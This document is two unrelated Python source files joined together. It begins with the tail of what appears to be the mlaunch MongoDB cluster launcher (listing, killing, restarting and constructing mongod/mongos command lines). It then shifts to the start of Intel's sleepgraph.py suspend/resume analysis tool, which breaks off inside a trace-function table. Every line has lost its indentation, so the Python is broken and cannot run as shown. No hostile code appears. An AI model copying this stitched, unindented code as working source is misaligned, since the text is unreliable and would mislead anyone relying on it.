for node in sorted(self.get_tagged(['config'])):
doc = OrderedDict([ ('process','config server'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['config'])) > 0:
print_docs.append( None )
# mongod
for shard in self._get_shard_names(self.loaded_args):
tags = []
replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
padding = ''
if shard:
print_docs.append(shard)
tags.append(shard)
padding = ' '
if replicaset:
# primary
primary = self.get_tagged(tags + ['primary', 'running'])
if len(primary) > 0:
node = list(primary)[0]
print_docs.append( OrderedDict([ ('process', padding+'primary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# secondaries
secondaries = self.get_tagged(tags + ['secondary', 'running'])
for node in sorted(secondaries):
print_docs.append( OrderedDict([ ('process', padding+'secondary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# data-bearing nodes that are down or not in the replica set yet
mongods = self.get_tagged(tags + ['mongod'])
arbiters = self.get_tagged(tags + ['arbiter'])
nodes = sorted(mongods - primary - secondaries - arbiters)
for node in nodes:
print_docs.append( OrderedDict([ ('process', padding+'mongod'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# arbiters
for node in arbiters:
print_docs.append( OrderedDict([ ('process', padding+'arbiter'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
else:
nodes = self.get_tagged(tags + ['mongod'])
if len(nodes) > 0:
node = nodes.pop()
print_docs.append( OrderedDict([ ('process', padding+'single'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
if shard:
print_docs.append(None)
processes = self._get_processes()
startup = self.startup_info
# print tags as well
for doc in filter(lambda x: type(x) == OrderedDict, print_docs):
try:
doc['pid'] = processes[doc['port']].pid
except KeyError:
doc['pid'] = '-'
if self.args['verbose'] or self.args['tags']:
tags = self.get_tags_of_port(doc['port'])
doc['tags'] = ', '.join(tags)
if self.args['startup']:
try:
# first try running process (startup may be modified via start command)
doc['startup command'] = ' '.join(processes[doc['port']].cmdline())
except KeyError:
# if not running, use stored startup_info
doc['startup command'] = startup[str(doc['port'])]
print_docs.append( None )
print
print_table(print_docs)
if self.loaded_args.get('auth'):
print('\tauth: "%s:%s"' % (self.loaded_args.get('username'),
self.loaded_args.get('password')))
def kill(self):
self.discover()
# get matching tags, can only send signals to running nodes
matches = self._get_ports_from_args(self.args, 'running')
processes = self._get_processes()
# convert signal to int, default is SIGTERM for graceful shutdown
sig = self.args.get('signal') or 'SIGTERM'
if type(sig) == int:
pass
elif isinstance(sig, str):
try:
sig = int(sig)
except ValueError as e:
try:
sig = getattr(signal, sig)
except AttributeError as e:
raise SystemExit("can't parse signal '%s', use integer or signal name (SIGxxx)." % sig)
for port in processes:
# only send signal to matching processes
if port in matches:
p = processes[port]
p.send_signal(sig)
if self.args['verbose']:
print " %s on port %i, pid=%i" % (p.name, port, p.pid)
print "sent signal %s to %i process%s." % (sig, len(matches), '' if len(matches) == 1 else 'es')
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
# very short sleep prevents that case, and it is practically not noticeable by users
time.sleep(0.1)
# refresh discover
self.discover()
def restart(self):
# get all running processes
processes = self._get_processes()
procs = [processes[k] for k in processes.keys()]
# stop nodes via stop command
self.stop()
# wait until all processes terminate
psutil.wait_procs(procs)
# start nodes again via start command
self.start()
# --- below are api helper methods, can be called after creating an MLaunchTool() object
def discover(self):
""" This method will go out to each of the processes and get their state. It builds the
self.cluster_tree, self.cluster_tags, self.cluster_running data structures, needed
for sub-commands start, stop, list.
"""
# self.args['command'] is required; return early if it's not available
if not self.args or not 'command' in self.args or not self.args['command']:
return
# load .mlaunch_startup file for start, stop, list, use current parameters for init
if self.args['command'] == 'init':
self.loaded_args, self.loaded_unknown_args = self.args, self.unknown_args
else:
if not self._load_parameters():
raise SystemExit("can't read %s/.mlaunch_startup, use 'mlaunch init ...' first." % self.dir)
# reset cluster_* variables
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# get shard names
shard_names = self._get_shard_names(self.loaded_args)
# some shortcut variables
is_sharded = 'sharded' in self.loaded_args and self.loaded_args['sharded'] != None
is_replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
is_csrs = 'csrs' in self.loaded_args and self.loaded_args['csrs']
is_single = 'single' in self.loaded_args and self.loaded_args['single']
has_arbiter = 'arbiter' in self.loaded_args and self.loaded_args['arbiter']
# determine number of nodes to inspect
if is_sharded:
num_config = self.loaded_args['config']
# at least one temp. mongos for adding shards, will be killed later on
num_mongos = max(1, self.loaded_args['mongos'])
num_shards = len(shard_names)
else:
num_shards = 1
num_config = 0
num_mongos = 0
num_nodes_per_shard = self.loaded_args['nodes'] if is_replicaset else 1
if has_arbiter:
num_nodes_per_shard += 1
num_nodes = num_shards * num_nodes_per_shard + num_config + num_mongos
current_port = self.loaded_args['port']
# tag all nodes with 'all'
self.cluster_tags['all'].extend ( range(current_port, current_port + num_nodes) )
# tag all nodes with their port number (as string) and whether they are running
for port in range(current_port, current_port + num_nodes):
self.cluster_tags[str(port)].append(port)
running = self.is_running(port)
self.cluster_running[port] = running
self.cluster_tags['running' if running else 'down'].append(port)
# find all mongos
for i in range(num_mongos):
port = i+current_port
# add mongos to cluster tree
self.cluster_tree.setdefault( 'mongos', [] ).append( port )
# add mongos to tags
self.cluster_tags['mongos'].append( port )
current_port += num_mongos
# find all mongods (sharded, replicaset or single)
if shard_names == None:
shard_names = [ None ]
for shard in shard_names:
port_range = range(current_port, current_port + num_nodes_per_shard)
# all of these are mongod nodes
self.cluster_tags['mongod'].extend( port_range )
if shard:
# if this is a shard, store in cluster_tree and tag shard name
self.cluster_tree.setdefault( 'shard', [] ).append( port_range )
self.cluster_tags[shard].extend( port_range )
if is_replicaset:
# get replica set states
rs_name = shard if shard else self.loaded_args['name']
try:
mrsc = Connection( ','.join( 'localhost:%i'%i for i in port_range ), replicaSet=rs_name )
# primary, secondaries, arbiters
# @todo: this is no longer working because MongoClient is now non-blocking
if mrsc.primary:
self.cluster_tags['primary'].append( mrsc.primary[1] )
self.cluster_tags['secondary'].extend( map(itemgetter(1), mrsc.secondaries) )
self.cluster_tags['arbiter'].extend( map(itemgetter(1), mrsc.arbiters) )
# secondaries in cluster_tree (order is now important)
self.cluster_tree.setdefault( 'secondary', [] )
for i, secondary in enumerate(sorted(map(itemgetter(1), mrsc.secondaries))):
if len(self.cluster_tree['secondary']) <= i:
self.cluster_tree['secondary'].append([])
self.cluster_tree['secondary'][i].append(secondary)
except (ConnectionFailure, ConfigurationError):
pass
elif is_single:
self.cluster_tags['single'].append( current_port )
# increase current_port
current_port += num_nodes_per_shard
# If not CSRS, set the number of config servers to be 1 or 3
# This is needed, otherwise `mlaunch init --sharded 2 --replicaset --config 2` on <3.3.0 will crash
if not self.args.get('csrs') and self.args['command'] == 'init':
if num_config >= 3:
num_config = 3
else:
num_config = 1
for i in range(num_config):
port = i+current_port
try:
mc = MongoConnection('localhost:%i'%port)
mc.admin.command('ping')
running = True
except ConnectionFailure:
# node not reachable
running = False
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
# add config server to tags
self.cluster_tags['config'].append( port )
self.cluster_tags['mongod'].append( port )
current_port += num_mongos
def is_running(self, port):
""" returns if a host on a specific port is running. """
try:
con = MongoConnection('localhost:%s' % port)
con.admin.command('ping')
return True
except (AutoReconnect, ConnectionFailure):
return False
def get_tagged(self, tags):
""" The format for the tags list is tuples for tags: mongos, config, shard, secondary tags
of the form (tag, number), e.g. ('mongos', 2) which references the second mongos
in the list. For all other tags, it is simply the string, e.g. 'primary'.
"""
# if tags is a simple string, make it a list (note: tuples like ('mongos', 2) must be in a surrounding list)
if not hasattr(tags, '__iter__') and type(tags) == str:
tags = [ tags ]
nodes = set(self.cluster_tags['all'])
for tag in tags:
if re.match(r"\w+ \d{1,2}", tag):
# special case for tuple tags: mongos, config, shard, secondary. These can contain a number
tag, number = tag.split()
try:
branch = self.cluster_tree[tag][int(number)-1]
except (IndexError, KeyError):
continue
if hasattr(branch, '__iter__'):
subset = set(branch)
else:
subset = set([branch])
else:
# otherwise use tags dict to get the subset
subset = set(self.cluster_tags[tag])
nodes = nodes.intersection(subset)
return nodes
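# Illustrative example (assuming a sharded setup): get_tagged(['shard 1', 'running'])
# returns the ports of the first shard's nodes that are currently running.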
def get_tags_of_port(self, port):
""" get all tags related to a given port (inverse of what is stored in self.cluster_tags) """
return sorted([tag for tag in self.cluster_tags if port in self.cluster_tags[tag] ])
def wait_for(self, ports, interval=1.0, timeout=30, to_start=True):
""" Given a list of ports, spawns up threads that will ping the host on each port concurrently.
Returns when all hosts are running (if to_start=True) / shut down (if to_start=False)
"""
threads = []
queue = Queue.Queue()
for port in ports:
threads.append(threading.Thread(target=wait_for_host, args=(port, interval, timeout, to_start, queue)))
if self.args and 'verbose' in self.args and self.args['verbose']:
print "waiting for nodes %s..." % ('to start' if to_start else 'to shutdown')
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# get all results back and return tuple
return tuple(queue.get_nowait() for _ in ports)
# --- below here are internal helper methods, should not be called externally ---
def _convert_u2b(self, obj):
""" helper method to convert unicode back to plain text. """
if isinstance(obj, dict):
return dict([(self._convert_u2b(key), self._convert_u2b(value)) for key, value in obj.iteritems()])
elif isinstance(obj, list):
return [self._convert_u2b(element) for element in obj]
elif isinstance(obj, unicode):
return obj.encode('utf-8')
else:
return obj
def _load_parameters(self):
""" tries to load the .mlaunch_startup file that exists in each datadir.
Handles different protocol versions.
"""
datapath = self.dir
startup_file = os.path.join(datapath, '.mlaunch_startup')
if not os.path.exists(startup_file):
return False
in_dict = self._convert_u2b(json.load(open(startup_file, 'r')))
# handle legacy version without versioned protocol
if 'protocol_version' not in in_dict:
in_dict['protocol_version'] = 1
self.loaded_args = in_dict
self.startup_info = {}
# hostname was added recently
self.loaded_args['hostname'] = socket.gethostname()
elif in_dict['protocol_version'] == 2:
self.startup_info = in_dict['startup_info']
self.loaded_unknown_args = in_dict['unknown_args']
self.loaded_args = in_dict['parsed_args']
# the 'authentication' key was renamed to 'auth'; if present (from an old environment), rename it
if 'authentication' in self.loaded_args:
self.loaded_args['auth'] = self.loaded_args['authentication']
del self.loaded_args['authentication']
return True
def _store_parameters(self):
""" stores the startup parameters and config in the .mlaunch_startup file in the datadir. """
datapath = self.dir
out_dict = {
'protocol_version': 2,
'mtools_version': __version__,
'parsed_args': self.args,
'unknown_args': self.unknown_args,
'startup_info': self.startup_info
}
if not os.path.exists(datapath):
os.makedirs(datapath)
try:
json.dump(out_dict, open(os.path.join(datapath, '.mlaunch_startup'), 'w'), -1)
except Exception:
pass
def _create_paths(self, basedir, name=None):
""" create datadir and subdir paths. """
if name:
datapath = os.path.join(basedir, name)
else:
datapath = basedir
dbpath = os.path.join(datapath, 'db')
if not os.path.exists(dbpath):
os.makedirs(dbpath)
if self.args['verbose']:
print 'creating directory: %s'%dbpath
return datapath
def _get_ports_from_args(self, args, extra_tag):
tags = []
if 'tags' not in args:
args['tags'] = []
for tag1, tag2 in zip(args['tags'][:-1], args['tags'][1:]):
if re.match('^\d{1,2}$', tag1):
print "warning: ignoring numeric value '%s'" % tag1
continue
if re.match('^\d{1,2}$', tag2):
if tag1 in ['mongos', 'shard', 'secondary', 'config']:
# combine tag with number into a single space-separated tag
tags.append( '%s %s' % (tag1, tag2) )
continue
else:
print "warning: ignoring numeric value '%s' after '%s'" % (tag2, tag1)
tags.append( tag1 )
if len(args['tags']) > 0:
tag = args['tags'][-1]
if not re.match('^\d{1,2}$', tag):
tags.append(tag)
tags.append(extra_tag)
matches = self.get_tagged(tags)
return matches
def _filter_valid_arguments(self, arguments, binary="mongod", config=False):
""" check which of the list of arguments is accepted by the specified binary (mongod, mongos).
returns a list of accepted arguments. If an argument does not start with '-' but its preceding
argument was accepted, then it is accepted as well. Example ['--slowms', '1000'] both arguments
would be accepted for a mongod.
"""
if self.args and self.args['binarypath']:
binary = os.path.join( self.args['binarypath'], binary)
# get the help list of the binary
ret = subprocess.Popen(['%s --help'%binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
accepted_arguments = []
# extract all arguments starting with a '-'
for line in [option for option in out.split('\n')]:
line = line.lstrip()
if line.startswith('-'):
argument = line.split()[0]
# exception: don't allow unsupported config server arguments
if config and argument in ['--oplogSize', '--storageEngine', '--smallfiles', '--nojournal']:
continue
accepted_arguments.append(argument)
# add undocumented options
accepted_arguments.append('--setParameter')
if binary == "mongod":
accepted_arguments.append('--wiredTigerEngineConfigString')
# filter valid arguments
result = []
for i, arg in enumerate(arguments):
if arg.startswith('-'):
# check if the binary accepts this argument or special case -vvv for any number of v
if arg in accepted_arguments or re.match(r'-v+', arg):
result.append(arg)
elif i > 0 and arguments[i-1] in result:
# if it doesn't start with a '-', it could be the value of the last argument, e.g. `--slowms 1000`
result.append(arg)
# return valid arguments as joined string
return ' '.join(result)
def _get_shard_names(self, args):
""" get the shard names based on the self.args['sharded'] parameter. If it's a number, create
shard names of type shard##, where ## is a 2-digit number. Returns a list [ None ] if
no shards are present.
"""
if 'sharded' in args and args['sharded']:
if len(args['sharded']) == 1:
try:
# --sharded was a number, name shards shard01, shard02, ... (only works with replica sets)
n_shards = int(args['sharded'][0])
shard_names = ['shard%.2i'%(i+1) for i in range(n_shards)]
except ValueError, e:
# --sharded was a string, use it as name for the one shard
shard_names = args['sharded']
else:
shard_names = args['sharded']
else:
shard_names = [ None ]
return shard_names
def _start_on_ports(self, ports, wait=False, overrideAuth=False):
threads = []
if overrideAuth and self.args['verbose']:
print "creating cluster without auth for setup, will enable auth at the end..."
for port in ports:
command_str = self.startup_info[str(port)]
if overrideAuth:
# this is to set up sharded clusters without auth first, then relaunch with auth
command_str = re.sub(r'--keyFile \S+', '', command_str)
try:
ret = subprocess.check_output([command_str], stderr=subprocess.STDOUT, shell=True)
binary = command_str.split()[0]
if '--configsvr' in command_str:
binary = 'config server'
if self.args['verbose']:
print "launching: %s" % command_str
else:
print "launching: %s on port %s" % (binary, port)
except subprocess.CalledProcessError, e:
print e.output
raise SystemExit("can't start process, return code %i. tried to launch: %s"% (e.returncode, command_str))
if wait:
self.wait_for(ports)
def _initiate_replset(self, port, name, maxwait=30):
# initiate replica set
if not self.args['replicaset'] and name != 'configRepl':
if self.args['verbose']:
print 'Skipping replica set initialization for %s' % name
return
con = MongoConnection('localhost:%i'%port)
try:
rs_status = con['admin'].command({'replSetGetStatus': 1})
except OperationFailure, e:
# not initiated yet
for i in range(maxwait):
try:
con['admin'].command({'replSetInitiate':self.config_docs[name]})
break
except OperationFailure, e:
print e.message, " - will retry"
time.sleep(1)
if self.args['verbose']:
print "initializing replica set '%s' with configuration: %s" % (name, self.config_docs[name])
print "replica set '%s' initialized." % name
def _add_user(self, port, name, password, database, roles):
con = MongoConnection('localhost:%i'%port)
try:
con[database].add_user(name, password=password, roles=roles)
except OperationFailure as e:
pass
except TypeError as e:
if pymongo_version < (2, 5, 0):
con[database].add_user(name, password=password)
warnings.warn('Your pymongo version is too old to support auth roles. Added a legacy user with root access. To support roles, you need to upgrade to pymongo >= 2.5.0')
else:
raise e
def _get_processes(self):
all_ports = self.get_tagged('running')
process_dict = {}
for p in psutil.process_iter():
# deal with zombie process errors in OSX
try:
name = p.name()
except psutil.NoSuchProcess:
continue
# skip all but mongod / mongos
if name not in ['mongos', 'mongod']:
continue
port = None
for possible_port in self.startup_info:
# compare ports based on command line argument
startup = self.startup_info[possible_port].split()
try:
p_port = p.cmdline()[p.cmdline().index('--port')+1]
startup_port = startup[startup.index('--port')+1]
except ValueError:
continue
if str(p_port) == str(startup_port):
port = int(possible_port)
break
# only consider processes belonging to this environment
if port in all_ports:
process_dict[port] = p
return process_dict
def _wait_for_primary(self):
hosts = [x['host'] for x in self.config_docs['replset']['members']]
rs_name = self.config_docs['replset']['_id']
mrsc = Connection( hosts, replicaSet=rs_name )
if mrsc.is_primary:
# update cluster tags now that we have a primary
self.cluster_tags['primary'].append( mrsc.primary[1] )
self.cluster_tags['secondary'].extend( map(itemgetter(1), mrsc.secondaries) )
self.cluster_tags['arbiter'].extend( map(itemgetter(1), mrsc.arbiters) )
# secondaries in cluster_tree (order is now important)
self.cluster_tree.setdefault( 'secondary', [] )
for i, secondary in enumerate(sorted(map(itemgetter(1), mrsc.secondaries))):
if len(self.cluster_tree['secondary']) <= i:
self.cluster_tree['secondary'].append([])
self.cluster_tree['secondary'][i].append(secondary)
return True
return False
# --- below are command line constructor methods, that build the command line strings to be called
def _construct_cmdlines(self):
""" This is the top-level _construct_* method. From here, it will branch out to
the different cases: _construct_sharded, _construct_replicaset, _construct_single. These
can themselves call each other (for example sharded needs to create the shards with
either replicaset or single node). At the lowest level, the construct_mongod, _mongos, _config
will create the actual command line strings and store them in self.startup_info.
"""
if self.args['sharded']:
# construct startup string for sharded environments
self._construct_sharded()
elif self.args['single']:
# construct startup string for single node environment
self._construct_single(self.dir, self.args['port'])
elif self.args['replicaset']:
# construct startup strings for a non-sharded replica set
self._construct_replset(self.dir, self.args['port'], self.args['name'], range(self.args['nodes']), self.args['arbiter'])
# discover current setup
self.discover()
def _construct_sharded(self):
""" construct command line strings for a sharded cluster. """
num_mongos = self.args['mongos'] if self.args['mongos'] > 0 else 1
shard_names = self._get_shard_names(self.args)
# create shards as stand-alones or replica sets
nextport = self.args['port'] + num_mongos
for shard in shard_names:
if self.args['single']:
self.shard_connection_str.append( self._construct_single(self.dir, nextport, name=shard, extra='--shardsvr') )
nextport += 1
elif self.args['replicaset']:
self.shard_connection_str.append( self._construct_replset(self.dir, nextport, shard, num_nodes=range(self.args['nodes']), arbiter=self.args['arbiter'], extra='--shardsvr') )
nextport += self.args['nodes']
if self.args['arbiter']:
nextport += 1
# start up config server(s)
config_string = []
# SCCC config servers (MongoDB <3.3.0)
if not self.args['csrs'] and self.args['config'] >= 3:
config_names = ['config1', 'config2', 'config3']
else:
config_names = ['config']
# CSRS config servers (MongoDB >=3.1.0)
if self.args['csrs']:
config_string.append(self._construct_config(self.dir, nextport, "configRepl", True))
else:
for name in config_names:
self._construct_config(self.dir, nextport, name)
config_string.append('%s:%i'%(self.args['hostname'], nextport))
nextport += 1
# multiple mongos use <datadir>/mongos/ as subdir for log files
if num_mongos > 1:
mongosdir = os.path.join(self.dir, 'mongos')
if not os.path.exists(mongosdir):
if self.args['verbose']:
print "creating directory: %s" % mongosdir
os.makedirs(mongosdir)
# start up mongos, but put them to the front of the port range
nextport = self.args['port']
for i in range(num_mongos):
if num_mongos > 1:
mongos_logfile = 'mongos/mongos_%i.log' % nextport
else:
mongos_logfile = 'mongos.log'
self._construct_mongos(os.path.join(self.dir, mongos_logfile), nextport, ','.join(config_string))
nextport += 1
def _construct_replset(self, basedir, portstart, name, num_nodes, arbiter, extra=''):
""" construct command line strings for a replicaset, either for sharded cluster or by itself. """
self.config_docs[name] = {'_id':name, 'members':[]}
# Construct individual replica set nodes
for i in num_nodes:
datapath = self._create_paths(basedir, '%s/rs%i'%(name, i+1))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+i, replset=name, extra=extra)
host = '%s:%i'%(self.args['hostname'], portstart+i)
member_config = {
'_id': len(self.config_docs[name]['members']),
'host': host,
}
# First node gets increased priority.
if i == 0 and self.args['priority']:
member_config['priority'] = 10
self.config_docs[name]['members'].append(member_config)
# launch arbiter if True
if arbiter:
datapath = self._create_paths(basedir, '%s/arb'%(name))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+self.args['nodes'], replset=name)
host = '%s:%i'%(self.args['hostname'], portstart+self.args['nodes'])
self.config_docs[name]['members'].append({'_id':len(self.config_docs[name]['members']), 'host':host, 'arbiterOnly': True})
return name + '/' + ','.join([c['host'] for c in self.config_docs[name]['members']])
def _construct_config(self, basedir, port, name=None, isReplSet=False):
""" construct command line strings for a config server """
if isReplSet:
return self._construct_replset(basedir=basedir, portstart=port, name=name, num_nodes=range(self.args['config']), arbiter=False, extra='--configsvr')
else:
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None, extra='--configsvr')
def _construct_single(self, basedir, port, name=None, extra=''):
""" construct command line strings for a single node, either for shards or as a stand-alone. """
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None, extra=extra)
host = '%s:%i'%(self.args['hostname'], port)
return host
def _construct_mongod(self, dbpath, logpath, port, replset=None, extra=''):
""" construct command line strings for mongod process. """
rs_param = ''
if replset:
rs_param = '--replSet %s'%replset
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
config = '--configsvr' in extra
extra = self._filter_valid_arguments(self.unknown_args, "mongod", config=config) + ' ' + extra
path = self.args['binarypath'] or ''
command_str = "%s %s --dbpath %s --logpath %s --port %i --logappend --fork %s %s"%(os.path.join(path, 'mongod'), rs_param, dbpath, logpath, port, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
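# An assembled startup string looks roughly like this (illustrative values):
#   mongod --replSet shard01 --dbpath <datadir>/db --logpath <datadir>/mongod.log --port 27018 --logappend --fork [--keyFile <dir>/keyfile] [extra args]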
def _construct_mongos(self, logpath, port, configdb):
""" construct command line strings for a mongos process. """
extra = ''
out = subprocess.PIPE
if self.args['verbose']:
out = None
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
extra = self._filter_valid_arguments(self.unknown_args, "mongos") + extra
path = self.args['binarypath'] or ''
command_str = "%s --logpath %s --port %i --configdb %s --logappend %s %s --fork"%(os.path.join(path, 'mongos'), logpath, port, configdb, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _read_key_file(self):
with open(os.path.join(self.dir, 'keyfile'), 'r') as f:
return ''.join(f.readlines())
def main():
tool = MLaunchTool()
tool.run()
if __name__ == '__main__':
sys.exit(main())
|
sleepgraph.py
|
#!/usr/bin/env python3
# SPDX-License-Identifier: GPL-2.0-only
#
# Tool for analyzing suspend/resume timing
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU General Public License,
# version 2, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# Authors:
# Todd Brandt <todd.e.brandt@linux.intel.com>
#
# Links:
# Home Page
# https://01.org/pm-graph
# Source repo
# git@github.com:intel/pm-graph
#
# Description:
# This tool is designed to assist kernel and OS developers in optimizing
# their linux stack's suspend/resume time. Using a kernel image built
# with a few extra options enabled, the tool will execute a suspend and
# will capture dmesg and ftrace data until resume is complete. This data
# is transformed into a device timeline and a callgraph to give a quick
# and detailed view of which devices and callbacks are taking the most
# time in suspend/resume. The output is a single html file which can be
# viewed in firefox or chrome.
#
# The following kernel build options are required:
# CONFIG_DEVMEM=y
# CONFIG_PM_DEBUG=y
# CONFIG_PM_SLEEP_DEBUG=y
# CONFIG_FTRACE=y
# CONFIG_FUNCTION_TRACER=y
# CONFIG_FUNCTION_GRAPH_TRACER=y
# CONFIG_KPROBES=y
# CONFIG_KPROBES_ON_FTRACE=y
#
# For kernel versions older than 3.15:
# The following additional kernel parameters are required:
# (e.g. in file /etc/default/grub)
# GRUB_CMDLINE_LINUX_DEFAULT="... initcall_debug log_buf_len=16M ..."
#
# ----------------- LIBRARIES --------------------
import sys
import time
import os
import string
import re
import platform
import signal
import codecs
from datetime import datetime, timedelta
import struct
import configparser
import gzip
from threading import Thread
from subprocess import call, Popen, PIPE
import base64
def pprint(msg):
print(msg)
sys.stdout.flush()
def ascii(text):
return text.decode('ascii', 'ignore')
# ----------------- CLASSES --------------------
# Class: SystemValues
# Description:
# A global, single-instance container used to
# store system values and test parameters
class SystemValues:
title = 'SleepGraph'
version = '5.8'
ansi = False
rs = 0
display = ''
gzip = False
sync = False
wifi = False
verbose = False
testlog = True
dmesglog = True
ftracelog = False
acpidebug = True
tstat = True
mindevlen = 0.0001
mincglen = 0.0
cgphase = ''
cgtest = -1
cgskip = ''
maxfail = 0
multitest = {'run': False, 'count': 1000000, 'delay': 0}
max_graph_depth = 0
callloopmaxgap = 0.0001
callloopmaxlen = 0.005
bufsize = 0
cpucount = 0
memtotal = 204800
memfree = 204800
srgap = 0
cgexp = False
testdir = ''
outdir = ''
tpath = '/sys/kernel/debug/tracing/'
fpdtpath = '/sys/firmware/acpi/tables/FPDT'
epath = '/sys/kernel/debug/tracing/events/power/'
pmdpath = '/sys/power/pm_debug_messages'
acpipath='/sys/module/acpi/parameters/debug_level'
traceevents = [
'suspend_resume',
'wakeup_source_activate',
'wakeup_source_deactivate',
'device_pm_callback_end',
'device_pm_callback_start'
]
logmsg = ''
testcommand = ''
mempath = '/dev/mem'
powerfile = '/sys/power/state'
mempowerfile = '/sys/power/mem_sleep'
diskpowerfile = '/sys/power/disk'
suspendmode = 'mem'
memmode = ''
diskmode = ''
hostname = 'localhost'
prefix = 'test'
teststamp = ''
sysstamp = ''
dmesgstart = 0.0
dmesgfile = ''
ftracefile = ''
htmlfile = 'output.html'
result = ''
rtcwake = True
rtcwaketime = 15
rtcpath = ''
devicefilter = []
cgfilter = []
stamp = 0
execcount = 1
x2delay = 0
skiphtml = False
usecallgraph = False
ftopfunc = 'pm_suspend'
ftop = False
usetraceevents = False
usetracemarkers = True
usekprobes = True
usedevsrc = False
useprocmon = False
notestrun = False
cgdump = False
devdump = False
mixedphaseheight = True
devprops = dict()
cfgdef = dict()
platinfo = []
predelay = 0
postdelay = 0
tmstart = 'SUSPEND START %Y%m%d-%H:%M:%S.%f'
tmend = 'RESUME COMPLETE %Y%m%d-%H:%M:%S.%f'
tracefuncs = {
'sys_sync': {},
'ksys_sync': {},
'__pm_notifier_call_chain': {},
'pm_prepare_console': {},
'pm_notifier_call_chain': {},
'freeze_processes': {},
'freeze_kernel_threads': {},
'pm_restrict_gfp_mask': {},
'acpi_suspend_begin': {},
'acpi_hibernation_begin': {},
'acpi_hibernation_enter': {},
'acpi_hibernation_leave': {},
'acpi_pm_freeze': {},
'acpi_pm_thaw': {},
'acpi_s2idle_end': {},
'acpi_s2idle_sync': {},
'acpi_s2idle_begin': {},
'acpi_s2idle_prepare': {},
'acpi_s2idle_prepare_late': {},
'acpi_s2idle_wake': {},
'acpi_s2idle_wakeup': {},
'acpi_s2idle_restore': {},
'acpi_s2idle_restore_early': {},
'hibernate_preallocate_memory': {},
'create_basic_memory_bitmaps': {},
'swsusp_write': {},
'suspend_console': {},
'acpi_pm_prepare': {},
'syscore_suspend': {},
'arch_enable_nonboot_cpus_end': {},
'syscore_resume': {},
'acpi_pm_finish': {},
'resume_console': {},
'acpi_pm_end': {},
'pm_restore_gfp_mask': {},
'thaw_processes': {},
'pm_restore_console': {},
'CPU_OFF': {
'func':'_cpu_down',
'args_x86_64': {'cpu':'%di:s32'},
'format': 'CPU_OFF[{cpu}]'
},
'CPU_ON': {
'func':'_cpu_up',
'args_x86_64': {'cpu':'%di:s32'},
'format': 'CPU_ON[{cpu}]'
},
}
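# The dev_tracefuncs below cover device/driver-level functions; they are turned into kprobes
# by setupAllKprobes(), and by initFtrace() only when usedevsrc is enabled.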
dev_tracefuncs = {
# general wait/delay/sleep
'msleep': { 'args_x86_64': {'time':'%di:s32'}, 'ub': 1 },
'schedule_timeout': { 'args_x86_64': {'timeout':'%di:s32'}, 'ub': 1 },
'udelay': { 'func':'__const_udelay', 'args_x86_64': {'loops':'%di:s32'}, 'ub': 1 },
'usleep_range': { 'args_x86_64': {'min':'%di:s32', 'max':'%si:s32'}, 'ub': 1 },
'mutex_lock_slowpath': { 'func':'__mutex_lock_slowpath', 'ub': 1 },
'acpi_os_stall': {'ub': 1},
'rt_mutex_slowlock': {'ub': 1},
# ACPI
'acpi_resume_power_resources': {},
'acpi_ps_execute_method': { 'args_x86_64': {
'fullpath':'+0(+40(%di)):string',
}},
# mei_me
'mei_reset': {},
# filesystem
'ext4_sync_fs': {},
# 80211
'ath10k_bmi_read_memory': { 'args_x86_64': {'length':'%cx:s32'} },
'ath10k_bmi_write_memory': { 'args_x86_64': {'length':'%cx:s32'} },
'ath10k_bmi_fast_download': { 'args_x86_64': {'length':'%cx:s32'} },
'iwlagn_mac_start': {},
'iwlagn_alloc_bcast_station': {},
'iwl_trans_pcie_start_hw': {},
'iwl_trans_pcie_start_fw': {},
'iwl_run_init_ucode': {},
'iwl_load_ucode_wait_alive': {},
'iwl_alive_start': {},
'iwlagn_mac_stop': {},
'iwlagn_mac_suspend': {},
'iwlagn_mac_resume': {},
'iwlagn_mac_add_interface': {},
'iwlagn_mac_remove_interface': {},
'iwlagn_mac_change_interface': {},
'iwlagn_mac_config': {},
'iwlagn_configure_filter': {},
'iwlagn_mac_hw_scan': {},
'iwlagn_bss_info_changed': {},
'iwlagn_mac_channel_switch': {},
'iwlagn_mac_flush': {},
# ATA
'ata_eh_recover': { 'args_x86_64': {'port':'+36(%di):s32'} },
# i915
'i915_gem_resume': {},
'i915_restore_state': {},
'intel_opregion_setup': {},
'g4x_pre_enable_dp': {},
'vlv_pre_enable_dp': {},
'chv_pre_enable_dp': {},
'g4x_enable_dp': {},
'vlv_enable_dp': {},
'intel_hpd_init': {},
